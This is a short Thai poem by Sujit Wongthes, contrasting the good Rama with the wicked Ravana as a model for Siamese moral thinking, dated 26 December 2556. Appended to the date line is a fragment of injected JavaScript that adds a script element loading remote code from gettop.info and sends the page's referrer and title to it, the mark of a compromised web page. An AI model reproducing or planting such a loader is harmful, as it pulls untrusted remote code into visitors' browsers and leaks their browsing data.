พระรามดี มีทศกัณฐ์ชั่ว

แสดงตัวขาวจัดดำจัดจ้าน

ต้นแบบสำนึกสยามฉนำนาน

บันดาลมีคนดีคนชั่วเลว

 

สุจิตต์ วงษ์เทศ

พฤหัสบดี 26 ธันวาคม 2556d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;